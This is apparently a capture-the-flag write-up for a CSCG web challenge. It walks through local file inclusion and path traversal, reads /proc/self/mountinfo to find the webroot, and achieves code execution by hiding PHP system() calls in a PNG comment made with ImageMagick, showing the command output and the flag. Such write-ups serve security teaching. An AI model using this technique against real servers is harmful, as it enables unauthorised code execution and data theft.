Web - Local Fun Inclusion

  • local file inclusion
  • path traversal in the site argument
  • get the list of mounts from /proc/self/mountinfo to find where the webroot is mounted: field 4 is the source path, field 5 is the mount point as the web server sees it


1007 984 253:0 /opt/local_fun_inclusion/website/src /var/www/site ro,relatime - xfs /dev/mapper/cl_hax1-root rw,seclabel,attr2,inode64,noquota

  • the uploaded files can be included raw here:


Seems like we can view our images without them being in an image tag, but can we execute code?

well, everything that gets included is parsed by PHP: as long as the file contains the magic <? ... ?> portion, whatever is inside it is executed. (The bare <? short tag only works because short_open_tag is enabled on this box; <?php is the safe choice when it isn't.) So we can insert system('uname -a'); into a PNG comment with ImageMagick:

$ convert black.png -set comment "<? system('uname -a');?>" out.png

including the uploaded file then returns the raw PNG bytes, but the comment no longer holds our code: PHP executed it and streamed the command output in its place (binary chunks abbreviated):

[PNG signature] IHDR ... gAMA ... cHRM ... bKGD ... pHYs ... tIME ... IDAT ... tEXt comment Linux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux ... tEXt date:create 2020-03-03T10:06:36+00:00 ... tEXt date:modify 2020-03-03T10:03:41+00:00 ... IEND

the png comment extracted:

commentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

As you can see, we've got code execution and know where the webroot is, so let's list all files in it:

$ convert black.png -set comment "<? system('ls -l /var/www/site/');?>" out.png

output after including the upload:

drwxr-xr-x. 2 root     root      168 Mar  2 22:51 css
-rw-r--r--. 1 root     root       57 Mar  2 22:51 flag.php
-rwxr-xr-x. 1 root     root     1813 Mar  2 22:51 index.php
drwxr-xr-x. 2 root     root      108 Mar  2 22:51 js
-rwxr-xr-x. 1 root     root     2802 Mar  2 22:51 upload.php
drwxr-xr-x. 2 www-data www-data  420 Mar  3 10:16 uploads
-rwxr-xr-x. 1 root     root      310 Mar  2 22:51 view.php

Let's read the content of flag.php!


$FLAG = "CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool}";


:::success
CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool}
:::